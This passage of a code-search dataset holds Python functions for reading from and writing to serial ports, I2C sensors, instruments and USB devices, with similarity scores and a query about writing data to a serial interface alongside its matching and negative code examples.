"def __recv(self):\n in_buffer = \"\"\n self.__ser.reset_input_buffer()\n while True:\n data_in = self.__ser.read(64)\n if not in_buffer and not data_in:\n time.sleep(0.1)\n continue\n if self.__debug:\n print \"<<< %s\" % binascii.hexlify(data_in)\n in_buffer += data_in\n if len(in_buffer) < 6:\n continue\n msg_id, param1, param2, dst, src = struct.unpack(\"<HBBBB\", in_buffer[0:6])\n msg_len = 6\n if dst | 0x80:\n # Packet is long format\n dst &= 0x7F\n msg_len += ((param2 << 8) | param1)\n # Check this message is from the controller and for us\n if dst != self.__src or src != self.__dst:\n in_buffer = \"\"\n continue\n if len(in_buffer) < msg_len:\n # Message is incomplete\n continue\n # Now look for messages we recognise\n if msg_id == self.MGMSG_MOT_GET_STATUSUPDATE:\n self.__decode_status(in_buffer[6:msg_len])\n in_buffer = in_buffer[msg_len:]\n continue\n elif msg_id == self.MGMSG_MOT_MOVE_COMPLETED:\n in_buffer = in_buffer[msg_len:]\n continue\n elif msg_id == self.MGMSG_MOT_MOVE_HOMED:\n in_buffer = in_buffer[msg_len:]\n continue\n # If we got here, the message was invalid\n # Clear the buffer to resynchronise\n in_buffer = \"\"\n continue",
"def data_received(self, data):\n for byte in serial.iterbytes(data):\n if self.in_data and (len(self.packet) < self.data_size):\n self.packet.extend(byte)\n if len(self.packet) == self.data_size:\n self.in_data = False\n # make read-only copy\n self.handle_packet(bytes(self.packet))\n del self.packet[:]\n # Since there is no 'byte' object, indexing a bytes or bytearray\n # object yields an int. Instead, we need to compare a bytes object\n # of size 1 with a bytes object of size 1\n elif byte == self.HEADER[self.header_pos:self.header_pos+1]:\n self.header_pos += 1\n if self.header_pos == len(self.HEADER):\n self.header_pos = 0\n self.in_data = True\n else:\n self.header_pos = 0",
"def read_data(self):\r\n\t\tdata0 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\tdata1 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\t\r\n\t\ttime.sleep(0.5)\r\n\t\t\r\n\t\t# Checking valid data\r\n\t\twhile (data0 == 0) and (data1 == 0) :\r\n\t\t\tdata0 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\t\tdata1 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\t\r\n\t\t# Convert the data to 12-bits\r\n\t\traw_adc = ((data0 & 0x0F) * 256.0) + data1\r\n\t\tangle = (raw_adc / 4096.0) * 360.0\r\n\t\t\r\n\t\treturn {'a' : angle}",
"def _read_packet(self, packet_id, data_bytes):\n self._serial_conn.send_command(_SENSORS_OPCODE+\" \"+str(packet_id))\n return self._serial_conn.read_data(data_bytes)",
"def serial_read_open(user_gpio, baud):\n return _u2i(_pigpio_command(_control, _PI_CMD_SLRO, user_gpio, baud))",
"def read_arduino_data_and_format_dictionary(self):\n\n # Use a thread to issue command to the serial port\n Worker(self.request_arduino_data)\n\n # Use another thread to receive all of the serial data\n arduino_lines = self.return_serial_lines()\n\n if arduino_lines:\n for line in arduino_lines:\n self.arduinoLineToDictionary(line)",
"def on_timer(self):\n self.read_serial_data()\n # self.update_monitor()",
"def read(self, bytes_to_receive=512, **kwargs):\n who_send = kwargs.get(\"who_send\", None)\n data = None\n if(self._type_connection == \"COM\"):\n data = self._connection.read(bytes_to_receive)\n else:\n msg = \"99, Error al recibir por la conexion {}\".format(self._type_connection)\n raise ValueError(msg)\n\n transa_log(data, is_hexa_data=True, who_send=who_send)\n return data",
"def read(self):\n try:\n cmd = 'SAMP:COUN 1' \n self.handle.write(cmd) #one sample per trigger\n self.handle.write('TRIG:SOUR BUS') #triggered by command\n self.handle.write('TRIG:COUN 1') #one trigger to return to wait for trg\n self.handle.write('INIT:IMM') #DVM to \"wait for trigger\" \n self.handle.write('*TRG')\n startTime = time.time()\n while True: #wait until measuring flag goes to 0\n try:\n measured = self.handle.ask(\"DATA:POIN?\")\n measured = measured.strip() #remove CR \n measured = int(measured) #convert to number\n if measured == 1: #final number of samples achieved\n break;\n except Exception:\n print('Dvm34411:read() polling failed !')\n raise\n \n if time.time() - startTime > self.timeout:\n print('Dvm34411:read() timeout !')\n return False\n \n time.sleep(1) \n reading = self.handle.ask('R? 1;') #definite-Length block format\n except Exception:\n print('Dvm34411.read() failed !')\n raise\n if reading[0] != '#':\n print('Dvm34411.read() DLB format error - # expected !')\n return False\n digits = int(reading[1])\n reading = reading[2 + digits:]\n rdg = float(reading)\n return rdg",
"def callback_dat(fd_):\n # receive data\n data = os.read(fd_, 8)\n if data == '':\n return\n data, = struct.unpack('<Q', data)\n # TODO: Interpret data",
"def _readData(self):\n # Debug. This fn should be called only after checking canRead()\n if not self._canRead():\n raise Exception(\"Trying to read more data than there is.\")\n\n data = self.buffer[:self._expectedByteCount]\n self.buffer = self.buffer[self._expectedByteCount:]\n\n return data",
"def Read_Byte(self):\r\n data = self.Port.read(1)\r\n return data",
"def _get_data(self, read_size):\n if NIX:\n return super(Keyboard, self)._get_data(read_size)\n return self._pipe.recv_bytes()",
"def __init__(self, port, baud=9600):\n self.ser = serial.Serial(port, baud)\n self.ser.reset_input_buffer()\n self.info = str(self.ser.readline())[2:-5].split(',')",
"def get_data(self):\n self.dev.write(1, 'A0')\n digit1, digit2 = self.dev.read(0x81, 64)[:2]\n # Save the data as voltage between 0.0 and 5.0\n self.data0.append((digit1 + 256*digit2)*5.0/1024)",
"def Serial(self):\n ret,buf= self.Bus.Transaction(chr(self.Address+1)+chr(Serial),0x06)\n return struct.unpack(\">L\", buf[2:6])[0]",
"def open_serial(self):\n self.port = serial.Serial(\n self.device,\n baudrate=SERIAL_BAUD,\n timeout=5.0,\n bytesize=serial.EIGHTBITS,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n xonxoff=False,\n rtscts=False,\n dsrdtr=False)\n\t\n self.port.flushInput()\n self.port.flushOutput()",
"def read(self):\n self._read_into_buffer()\n # print([hex(i) for i in self._buffer])\n\n # check packet header\n if not self._buffer[0:2] == b\"BM\":\n raise RuntimeError(\"Invalid PM2.5 header\")\n\n # check frame length\n frame_len = struct.unpack(\">H\", self._buffer[2:4])[0]\n if frame_len != 28:\n raise RuntimeError(\"Invalid PM2.5 frame length\")\n\n checksum = struct.unpack(\">H\", self._buffer[30:32])[0]\n check = sum(self._buffer[0:30])\n if check != checksum:\n raise RuntimeError(\"Invalid PM2.5 checksum\")\n\n # unpack data\n (\n self.aqi_reading[\"pm10 standard\"],\n self.aqi_reading[\"pm25 standard\"],\n self.aqi_reading[\"pm100 standard\"],\n self.aqi_reading[\"pm10 env\"],\n self.aqi_reading[\"pm25 env\"],\n self.aqi_reading[\"pm100 env\"],\n self.aqi_reading[\"particles 03um\"],\n self.aqi_reading[\"particles 05um\"],\n self.aqi_reading[\"particles 10um\"],\n self.aqi_reading[\"particles 25um\"],\n self.aqi_reading[\"particles 50um\"],\n self.aqi_reading[\"particles 100um\"],\n ) = struct.unpack(\">HHHHHHHHHHHH\", self._buffer[4:28])\n\n return self.aqi_reading",
"def get_data(N,port_name,port_speed):\r\n t = np.zeros(N) # array for timestamps \r\n percent = np.zeros(N) # array for percentage values\r\n \r\n # get data from serial port\r\n with serial.Serial(port=port_name,baudrate=port_speed,timeout=2) as myport:\r\n \r\n sleep(2) # allow arduino to reset itself\r\n \r\n while (get_valid_line(myport) != 'START'):\r\n pass # wait until start tag is received\r\n \r\n # retrieve data\r\n for i in range(N):\r\n \r\n line = get_valid_line(myport) # check for valid line\r\n \r\n if line == 'START': # ignore any subsequent tags\r\n line = myport.readline()\r\n \r\n stamp, val = [int(a) for a in line.split()] # seperate data\r\n t[i] = stamp/1e3 # convert to seconds\r\n percent[i] = (val/1023)*100 # convert to percentage of max \r\n \r\n return t,percent",
"def Read(self):\n if not self._mem: return self.data\n\n logger.info(\"Read %s\" % self)\n self.data = self.hostmemmgr.read(self._mem, self.size)\n\n logger.info(\"=\" * 30, \"READ BUFFER\", \"=\" * 30)\n scapyfactory.Parse(self.data).Show()\n logger.info(\"=\" * 30, \"END READ BUFFER\", \"=\" * 30)\n\n return self.data"
] | [
"0.74985415",
"0.7416476",
"0.7264147",
"0.71994764",
"0.7146726",
"0.71219176",
"0.70422417",
"0.68189454",
"0.67572755",
"0.6739092",
"0.6716637",
"0.667686",
"0.6584695",
"0.6572481",
"0.6557061",
"0.65287864",
"0.6526724",
"0.650409",
"0.6499726",
"0.6484594",
"0.6483244",
"0.64595467",
"0.6445724",
"0.6421115",
"0.64190924",
"0.639229",
"0.63841844",
"0.63290405",
"0.63272965",
"0.6326819",
"0.6325473",
"0.6276665",
"0.6259761",
"0.6257517",
"0.62531996",
"0.6225641",
"0.6212478",
"0.62091583",
"0.619777",
"0.6188115",
"0.6170699",
"0.61639786",
"0.61630696",
"0.615248",
"0.61483914",
"0.61390716",
"0.6125692",
"0.61166143",
"0.61131835",
"0.60861045",
"0.6081972",
"0.60746944",
"0.6063353",
"0.6056509",
"0.60519034",
"0.6045715",
"0.6041871",
"0.603988",
"0.60337406",
"0.6025514",
"0.6019147",
"0.6015582",
"0.6006953",
"0.6004283",
"0.5997777",
"0.59965664",
"0.59727114",
"0.59698206",
"0.59544116",
"0.5941842",
"0.5940685",
"0.5930534",
"0.5926643",
"0.5926615",
"0.5921178",
"0.5920802",
"0.58992475",
"0.58965087",
"0.58868635",
"0.5871683",
"0.5861387",
"0.5861267",
"0.58544296",
"0.5851135",
"0.5827961",
"0.5824592",
"0.5824184",
"0.5822255",
"0.58204967",
"0.5810291",
"0.5806735",
"0.5801447",
"0.5792541",
"0.578439",
"0.5778896",
"0.5776895",
"0.577534",
"0.57688946",
"0.5768597",
"0.5754679"
] | 0.66642123 | 12 |
Write data to the serial interface. Raises an IOError if not connected. | def s_write(self, data):
    self.s.flushOutput()
    if self.s.is_open:
        try:
            self.s.write(data)
            if self.log_output:
                self.logfile.write('\nIN :' + str(len(data)) + '[' + hexlify(data) + ']' + '\n')
        except Exception as e:
            print("Could not write to port " + str(e))
    else:
        raise IOError('Comport is not open, use ctl_connect()')
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def write(self, data):\n try:\n self.ser.write(data)\n except SerialException as se:\n log.debug('Serial connection write error: {}'.format(se))",
"def serial_write(data):\n global ser\n if ser.writable():\n ser.write(data)\n else:\n print 'The serial', ser.portstr, 'cannot be written.'",
"def write(self, data):\n try:\n self.arduino.write(data)\n except Exception:\n raise",
"def write(self, data):\n if self.EMULATOR_MODE:\n self.protocol.sigRecvdMoveOK.emit()\n return\n\n # Check if serial connection is active and error if not\n if not self.serial or not self.serial.writable():\n self.protocol.sigRecvdHWError.emit()\n else:\n self._lock.lock()\n self.serial.write(data)\n self._lock.unlock()",
"def write(self, data):\n self._check_not_closed()\n raise io.UnsupportedOperation(\"Write not supported\")",
"def send(self, data):\r\n\r\n self._serial_object.write(data)",
"def callback_serial_write(data):\n serial_write(data.data)",
"def writeSomeData(self, data):\n raise IOError(\"Input device is read-only!\")",
"def write(self, data):\n try:\n self._conn.send(data)\n except OSError as exc:\n raise TS3ConnectionClosedException(OSError) from exc",
"def write(self, data):\n _check_init()\n self._check_open()\n\n self._output.Write(data)",
"def write(self, data):\n with self.writing:\n raise NotImplementedError()",
"def _write(self, data):\n if not self.connected:\n raise IOError(\"Not connected.\")\n\n if len(data + b'\\r\\n') > self.MAX_MESSAGE_SIZE:\n logger.error(\n \"A message wasn't sent to %r because it was larger than %d \"\n \"bytes (that is MAX_MESSAGE_SIZE). Consider raising that \"\n \"value if the message seemed legit.\", self._repr_remote(),\n self.MAX_MESSAGE_SIZE)\n # No need to call finalize.\n raise IOError(\"Message too long.\")\n\n try:\n with self._write_lock:\n if not self.connected:\n raise IOError(\"Not connected.\")\n # Does the same as self._socket.sendall.\n self._writer.write(data + b'\\r\\n')\n self._writer.flush()\n except socket.error as error:\n self.finalize(\"Write failed.\")\n logger.warning(\"Failed writing to socket: %s.\", error)\n raise error",
"def write(self, data):\n raise NotImplementedError()",
"def write(self, data: bytes) -> Tuple[int, StatusCode]:\n logger.debug(\"Serial.write %r\" % data)\n end_out, _ = self.get_attribute(ResourceAttribute.asrl_end_out)\n send_end, _ = self.get_attribute(ResourceAttribute.send_end_enabled)\n\n if end_out in (SerialTermination.none, SerialTermination.termination_break):\n pass\n elif end_out == SerialTermination.last_bit:\n last_bit, _ = self.get_attribute(ResourceAttribute.asrl_data_bits)\n mask = 1 << (last_bit - 1)\n data = bytes(iter_bytes(data, mask, send_end))\n\n elif end_out == SerialTermination.termination_char:\n term_char, _ = self.get_attribute(ResourceAttribute.termchar)\n data = data + common.int_to_byte(term_char)\n\n else:\n raise ValueError(\"Unknown value for VI_ATTR_ASRL_END_OUT: %s\" % end_out)\n\n try:\n count = self.interface.write(data)\n\n if end_out == SerialTermination.termination_break:\n logger.debug(\"Serial.sendBreak\")\n self.interface.sendBreak()\n\n return count, StatusCode.success\n\n except serial.SerialTimeoutException:\n return 0, StatusCode.error_timeout",
"def write(self, data: bytes) -> None:\n self.device.write(binascii.unhexlify(data))",
"def write(self, data):\n with self._write_lock:\n self.socket.send(data)",
"def _write(self, data):\n self._writer.write(data)",
"def write(self, data: str) -> None:\n # Nothing to write as this is a headless driver.",
"def _write(self, location, data):\n self._connector.write(location=location, data=data)",
"def send_command(self):\n if self.serial.is_open:\n try:\n # Unicode strings must be encoded\n data = bytes(self.command + '\\r\\n', encoding='utf-8')\n self.serial.flushInput()\n self.serial.write(data)\n except Exception as ex:\n self.handle_serial_error(ex)\n else:\n raise IOError('Try to send data when the connection is closed')",
"def write(self, data):\n self._write_lock.acquire()\n try:\n self.socket.sendall(data)\n finally:\n self._write_lock.release()",
"def _write_v1(self, data):\n return self.usb_dev.write(self.ep_out, data, self.interface, self.usb_wr_timeout)",
"def write(self, data: bytes) -> None:\n pass",
"def __write(self, data):\n return self.__descriptor.write(data.encode(\"utf-8\") + b'\\n')",
"def __write(self, cmd):\n\n if self.__port:\n cmd += b\"\\r\\n\" # terminate\n print(\"write: \" + repr(cmd))\n self.__port.flushInput() # dump everything in the input buffer\n self.__port.write(cmd) # turn the string into bytes and write\n self.__port.flush() # wait for the output buffer to finish transmitting\n else:\n print(\"cannot perform __write() when unconnected\")",
"def write(self, data):\n return 0",
"def write(self, data: bytes):\n self._writer.write(data)",
"def write(self, payload, log=False):\n try:\n if self.serial:\n self.serial.write(payload.encode(\"utf-8\"))\n if log:\n self.logger.prn_txd(payload)\n return True\n except SerialException as e:\n self.serial = None\n self.LAST_ERROR = \"connection lost, serial.write(%d bytes): %s\" % (\n len(payload),\n str(e),\n )\n self.logger.prn_err(str(e))\n return False",
"def write(self, data):\r\n try:\r\n char_handle = self._stdinout_characteristic.getHandle()\r\n bytes_sent = 0\r\n while bytes_sent < len(data):\r\n # Computing data to send.\r\n bytes_to_send = min(\r\n self._MAXIMUM_MESSAGE_SIZE_BYTES,\r\n len(data) - bytes_sent\r\n )\r\n data_to_send = data[bytes_sent:bytes_sent + bytes_to_send]\r\n\r\n # Writing data.\r\n self._node.writeCharacteristic(\r\n char_handle,\r\n data_to_send,\r\n True)\r\n bytes_sent += bytes_to_send\r\n\r\n # Calling on-write callback for a debug characteristic.\r\n self.on_write_characteristic(\r\n self._stdinout_characteristic, data_to_send, True)\r\n\r\n return bytes_sent\r\n\r\n except BTLEException as e:\r\n self._node._unexpected_disconnect()",
"def write(self, msg):\n # Transmit messages using the serial connection. Encodes strings to byte-arrays\n self.Serial.write(msg.encode('ascii'))",
"def write(self, filename, data):\n raise NotImplementedError",
"def write(self, data, **kwargs):\n audit_msg = kwargs.get(\"audit_msg\", None)\n who_send = kwargs.get(\"who_send\", None)\n is_hexa = kwargs.get(\"is_hexa\", False)\n\n if(self._type_connection == \"COM\"):\n self._connection.write(data)\n else:\n msg = \"99, Error al enviar por la conexion {}\".format(self._type_connection)\n raise ValueError(msg)\n\n if(is_hexa and audit_msg):\n transa_log(data, is_hexa_data=is_hexa, who_send=who_send)\n transa_log(audit_msg)\n elif(is_hexa and not audit_msg):\n transa_log(data, is_hexa_data=is_hexa, who_send=who_send)",
"def write(self, data):\n if self.closed:\n raise ConnectionResetError(\n 'Transport closed - cannot write on %s' % self\n )\n else:\n t = self.transport\n if self._paused or self._buffer:\n self._buffer.appendleft(data)\n self._buffer_size += len(data)\n self._write_from_buffer()\n if self._buffer_size > 2 * self._b_limit:\n if self._waiter and not self._waiter.cancelled():\n self.logger.warning(\n '%s buffer size is %d: limit is %d ',\n self._buffer_size, self._b_limit\n )\n else:\n t.pause_reading()\n self._waiter = self._loop.create_future()\n else:\n t.write(data)\n self.changed()\n return self._waiter",
"def write_data(self, data):\n print('Wrote %d bytes' % (len(data)))",
"def write(self, data, timeout=None):\n assert self._locked\n\n if timeout is None:\n timeout = self.timeout\n self.ep_data_out.write(data, self.timeout)",
"def write(self, data):\n\t\tself.outputbuffer.write(data)",
"def _serial_write(self, values_to_write):\n if self.verbose:\n self.log(\"Writing 0x{:x} to serial port...\".format(values_to_write))\n if type(values_to_write) is not list:\n self.serial.write(bytearray([values_to_write]))\n else:\n self.serial.write(bytearray(values_to_write))",
"def async_write(self, data) -> None:\n if data and self.__is_active:\n # logging.info('async_write: ' + str(data))\n self.__client_socket.async_write_all(data, self.__async_write_callback)\n\n # logging.info('async_write done')",
"def _write_v2(self, data):\n return self.usb_dev.write(self.ep_out, data, self.usb_wr_timeout)",
"def write(self, data, handle=None):\n if not isinstance(data, (bytes, bytearray, memoryview)):\n raise TypeError(\"data: expecting a bytes-like instance, got {!r}\"\n .format(type(data).__name__))\n if handle is not None and not isinstance(self._handle, pyuv.Pipe):\n raise ValueError('handle: can only be sent over pyuv.Pipe')\n self._check_status()\n if not self._writable:\n raise TransportError('transport is not writable')\n if self._closing:\n raise TransportError('transport is closing')\n try:\n if handle:\n self._handle.write(data, self._on_write_complete, handle)\n else:\n self._handle.write(data, self._on_write_complete)\n except pyuv.error.UVError as e:\n self._error = TransportError.from_errno(e.args[0])\n self.abort()\n raise compat.saved_exc(self._error)\n # We only keep track of the number of outstanding write requests\n # outselves. See note in get_write_buffer_size().\n self._write_buffer_size += 1\n self._maybe_pause_protocol()",
"def put(self,data):\n\n\t\tself.fd.write(str(data))\n\t\treturn 1",
"def send_data(self, data):\n self._transport.write(data)",
"def write(self, data):\n return self._write(self.wfile, data)",
"def _write(self, data):\n\n ret = False\n extended_address = SettingsBase.get_setting(self, \"extended_address\")\n addr = (extended_address, 0xe8, 0xc105, 0x11)#prey this works, I can't test it...\n try:\n self.__xbee_manager.xbee_device_xmit(0xe8, data, addr)\n ret = True\n print \"success!\" #\n except:\n print \"(..., 0xc105, 0x11) faild, trying (..., 0, 0)\" #\n try: #\n addr = (extended_address, 0xe8, 0, 0) #\n self.__xbee_manager.xbee_device_xmit(0xe8, data, addr) #\n ret = True #\n print \"success!\" #\n except: #\n print \"(..., 0, 0) faild\" #\n pass\n return ret",
"def write(self, index, data):\n isNotFirstCmd = False\n # Write Opcode\n self.__ser_wr_trans(RG_WR, isNotFirstCmd)\n isNotFirstCmd = True\n # Write Address\n self.__ser_wr_trans(index, isNotFirstCmd)\n # Write Data\n self.__ser_wr_trans(data, isNotFirstCmd)",
"def write(self, message):\n\n if self.multi_command is not None:\n log.debug(\n 'Writing to multi-command buffer for device \"{0}\": {1!r}'.format(self.name, message))\n\n self.multi_command.append(message)\n return\n\n log.debug('Writing to device \"{0}\": {1!r}'.format(self.name, message))\n\n if self.driver == drivers.pyvisa:\n try:\n self.device.write(message)\n except pyvisa.VisaIOError as e:\n if e.error_code == pyvisa.errors.VI_ERROR_TMO:\n print(\"In pyvisa timeout error\")\n raise DeviceTimeout(e)\n else:\n raise\n\n elif self.driver == drivers.telnet:\n try:\n self.device.write(message)\n except Exception:\n if e is socket.timeout:\n raise DeviceTimeout(e)\n else:\n raise\n\n elif self.driver == drivers.requests:\n r = requests.get(self.request_address + message)\n if r.status_code != 200:\n raise Exception(\"Write did not work\")\n\n elif self.driver == drivers.lgpib:\n try:\n self.device.write(message)\n except gpib.GpibError as e:\n if 'timeout' in e.message:\n raise DeviceTimeout(e)\n else:\n raise\n\n elif self.driver == drivers.pyvisa_usb:\n # Send the message raw.\n if not (legacyVisa):\n self.device.write_raw(message)\n else:\n pyvisa.vpp43.write(self.device.vi, message)\n\n else:\n print(\"Passed without writing\")",
"def writeToSerial( self, message ):\n self.checkConnection()\n self.ser.write( message )\n resp = yield self.ser.read( len( RESP_STRING ) )\n if RESP_STRING != resp:\n# Since we didn't get the the correct response,\n# place the value back in the front of the queue\n# and wait for a specified ERROR_TIME before\n# checking the queue again.\n if self.error_count > MAX_ERROR_COUNT:\n raise Exception (\"Too many communciation errors\")\n self.queue.insert( 0, message )\n self.error_count += 1\n reactor.callLater( ERROR_TIME, self.checkQueue )\n print 'Correct response from DC box not received, sleeping for short period'\n else:\n #got the correct response, clear the erros, moving on\n self.error_count = 0\n self.checkQueue()",
"def write( data ):",
"def write(self, data):\n self.buffer.write(data)\n self.offset += len(data)",
"def write(self, data, timeout_ms=0):\n if not self.is_valid():\n return 0\n if isinstance(self.__usb_dev, MpUsbApi):\n num = self.__usb_dev.MPUSBWrite(self.__handle_write, data, timeout_ms)\n else:\n num = self.__usb_dev.write(1, data, timeout_ms)\n return num\n #end write()",
"def write(self, device_id, address, data = None, mem_device = False):\n raise AssertionError(\"write function is not implemented\")",
"def writeLine(self, data):\n raise NotImplementedError()",
"def open_serial(self):\n self.port = serial.Serial(\n self.device,\n baudrate=SERIAL_BAUD,\n timeout=5.0,\n bytesize=serial.EIGHTBITS,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n xonxoff=False,\n rtscts=False,\n dsrdtr=False)\n\t\n self.port.flushInput()\n self.port.flushOutput()",
"def _write(self, s):\n try:\n self._sock.sendall(s)\n except socket.error, e:\n if e.args[0] == 32:\n # broken pipe\n self.disconnect()\n raise ConnectionError(\"Error %s while writing to socket. %s.\" % tuple(e.args))",
"def write(self, data: Union[str, bytes]) -> None:\n ...",
"def writer(self):\n while self.alive:\n try:\n if controlEvent.isSet() == False:\n self.alive = False\n self.thread_read.join()\n break\n data = self.socket.recv(1024)\n if not data:\n break\n #if self.ser_newline and self.net_newline:\n # do the newline conversion\n # XXX fails for CR+LF in input when it is cut in half at the begin or end of the string\n #data = ser_newline.join(data.split(net_newline))\n # Only send data to serial if it is in active state\n if controlEvent.isSet() == True:\n self.serial.write(data) # get a bunch of bytes and send them\n # the spy shows what's on the serial port, so log it after converting newlines\n if self.spy:\n sys.stdout.write(codecs.escape_encode(data)[0])\n sys.stdout.flush()\n except socket.timeout:\n continue\n except socket.error, msg:\n sys.stderr.write('writer socket.error: %s\\n' % msg)\n # probably got disconnected\n break\n except IOError, msg:\n sys.stderr.write('writer IOError: %s\\n' % msg)\n except Exception, msg:\n sys.stderr.write('writer Other Exception: %s\\n' % msg)\n #self.alive = False",
"def send_serial_command(data):\n print(data)\n serial_command = data\n SERIAL_PARENT.send(serial_command)\n OUTGOING.append(serial_command)",
"async def write(self, data: bytes):\n while data:\n await self.wait_for_write()\n try:\n sent = self.socket.send(data)\n except OSError as e:\n self.logger.debug(\"Failed to write: %s\", e)\n raise asyncio.TimeoutError()\n data = data[sent:]",
"def write(data):",
"def write(self, data, timeout_ms=None, **kwargs):\n raise NotImplementedError(\"implement in derived transport class\")",
"def _write_and_flush(self, data):\n try:\n self.stdout.write(data)\n self.stdout.flush()\n except IOError as e:\n if e.args and e.args[0] == errno.EINTR:\n # Interrupted system call. Can happpen in case of a window\n # resize signal. (Just ignore. The resize handler will render\n # again anyway.)\n pass\n else:\n raise",
"def close_serial(self):\n if(self.serial):\n self.serial.flush()\n self.serial.close()\n self.serial = False",
"def Send(self, data):\n # TODO(josephsih): should have a method to check the connection status.\n # Currently, once RN-42 is connected to a remote host, all characters\n # except chr(0) transmitted through the serial port are interpreted\n # as characters to send to the remote host.\n logging.debug('HID device sending %r...', data)\n self.SerialSendReceive(data, msg='BluetoothHID.Send')\n time.sleep(self.send_delay)",
"def write(self, addr, data, control):\n if not self._is_u32(addr):\n raise ValueError('The addr parameter must be an unsigned 32-bit value.')\n\n if not self._is_valid_buf(data):\n raise ValueError('The data parameter must be a sequence type with at least one item.')\n\n if not self._is_bool(control):\n raise ValueError('The control parameter must be a boolean value.')\n\n addr = ctypes.c_uint32(addr)\n data_len = ctypes.c_uint32(len(data))\n data = (ctypes.c_uint8 * data_len.value)(*data)\n control = ctypes.c_bool(control)\n\n result = self._lib.NRFJPROG_write(addr, ctypes.byref(data), data_len, control)\n if result != NrfjprogdllErr.SUCCESS:\n raise APIError(result)",
"def qspi_write(self, addr, data):\n if not self._is_u32(addr):\n raise ValueError('The addr parameter must be an unsigned 32-bit value.')\n \n if not self._is_valid_buf(data):\n raise ValueError('The data parameter must be a sequence type with at least one item.')\n \n addr = ctypes.c_uint32(addr)\n data_len = ctypes.c_uint32(len(data))\n data = (ctypes.c_uint8 * data_len.value)(*data)\n \n result = self._lib.NRFJPROG_qspi_write(addr, ctypes.byref(data), data_len)\n if result != NrfjprogdllErr.SUCCESS:\n raise APIError(result)",
"def write_to_serial(self, string):\n serialcmd = string + self._line_terminator\n self._ser.write(serialcmd.encode())\n time.sleep(self._sleep_time)",
"def write(self, data_to_write):\n self.single_file.write(data_to_write)\n self.single_file.flush()",
"def SERIAL_SEND_cmd(self, cmd):\n # Must be connected & operational\n if self.State == 0:\n # a slightly more informative result might help\n return \n\n # SEND\n if self.Port.writable():\n #print \"\\nwriting \" + cmd + \" to port...\"\n for c in str(cmd):\n self.Port.write(c)\n self.Port.write(\"\\r\\n\")\n\n return",
"def Test_serial_write(self, mock_serial_port):\n self.portdetect = ['ttyUSB0', 'ttyUSB1']\n self.baudrate = 9600\n port = serial_port_connection(self.portdetect, baudrate=self.baudrate)\n # serial_write called with a dummy character\n Test_object.serial_write('p')\n \"\"\"\n testing whether serial.write of the Pyserial api\n is called with right arguments\n \"\"\"\n mock_serial_port.return_value.write.assert_called_once_with('p')\n data_buffer = []\n \"\"\"\n calling config register and checking whether\n serial.write of Pyserial has appropriate calls\n \"\"\"\n data_buffer = Test_object.config_register('DDRA', Pins=[3],\n set_pins=True)\n expected = [mock.call(x) for x in data_buffer]\n port.write.assert_has_calls(expected)",
"def write( self, data ):\n os.write( self.stdin.fileno(), data )",
"def send(self, data):\n self._serial.write('spi = SPI(2, SPI.SLAVE, baudrate=500000, polarity=0, phase=0)\\r\\n'.encode('utf-8'))\n self._serial.write('data=bytearray({})\\r\\n'.format(data).encode('utf-8'))\n self._serial.write('spi.send(data, timeout=50000)\\r\\n'.encode('utf-8'))\n sleep(1)",
"def _write(self, register, data):\n\n # data: list of bytes to write to register\n assert register in _registers, '%r is not a valid register. Register must be passed as string.' %register\n assert len(data) == _register_len[register], 'Must pass %r byte(s) to %r register.' %(_register_len[register], register)\n\n # send the register we want to write to\n self.spi.writebytes([_registers[register]])\n\n # send the bytes we write to the register\n self.spi.writebytes(data)",
"def write_data(self, data):\n ofs = 0\n size = len(data)\n try:\n while ofs < size:\n # how many bytes should we write?\n wr_size = self.wrbuf_chunksize\n if wr_size > size - ofs:\n # reduce the write size\n wr_size = size - ofs\n # write the bytes\n n = self._write(data[ofs : ofs + wr_size])\n if n <= 0:\n raise usbdev_error(\"USB bulk write error\")\n ofs += n\n # return the number of bytes written\n return ofs\n except usb.core.USBError as e:\n raise usbdev_error(str(e))",
"def write(self, data, meta):\n raise NotImplementedError",
"def write(self, address, data, progress_update=None):\n size_remain = len(data)\n\n while size_remain > 0:\n if progress_update is not None:\n progress_update(\n int(100 * (len(data) - size_remain) / len(data)))\n\n part_size = self.__RW_MAX_SIZE \\\n if size_remain > self.__RW_MAX_SIZE else size_remain\n offset = address + len(data) - size_remain\n\n for retry in range(0, self.__RETRY_MAX_NUM):\n self._send_command(self.__COMMAND['write memory'])\n self._set_address(offset)\n\n chunk = data[offset - address:offset - address + part_size]\n checksum = 0xff & ((part_size - 1) ^ self._checksum(chunk))\n\n bytes_sent = self._port_handle.write(bytearray([part_size - 1]))\n if bytes_sent != len(bytearray([part_size - 1])):\n raise DfuException('Tried to send {} bytes, {} was '\n 'sent.'.format(\n len(bytearray([part_size - 1])),\n bytes_sent))\n\n bytes_sent = self._port_handle.write(chunk)\n if bytes_sent != len(chunk):\n raise DfuException('Tried to send {} bytes, {} was '\n 'sent.'.format(len(chunk), bytes_sent))\n\n bytes_sent = self._port_handle.write(bytearray([checksum]))\n if bytes_sent != len(bytearray([checksum])):\n raise DfuException('Tried to send {} bytes, {} was '\n 'sent.'.format(\n len(bytearray([checksum])),\n bytes_sent))\n\n if self._is_acknowledged():\n break\n else:\n raise DfuException('Write memory at {} failed after {} '\n 'retries.'.format(offset, retry + 1))\n\n size_remain -= part_size\n\n if progress_update is not None:\n progress_update(100)",
"def write_led(my_bus, d0, d1, d2, d3):\n data = [d0, 0x00, d1, 0x00, 0x00, 0x00, d2, 0x00, d3, 0x00]\n\n try:\n my_bus.write_i2c_block_data(LED_DEVICE_ADDRESS, 0x00, data)\n except IOError:\n t = 0.1\n print(\"got IOError. try again in\", t, \"second\")\n time.sleep(t)",
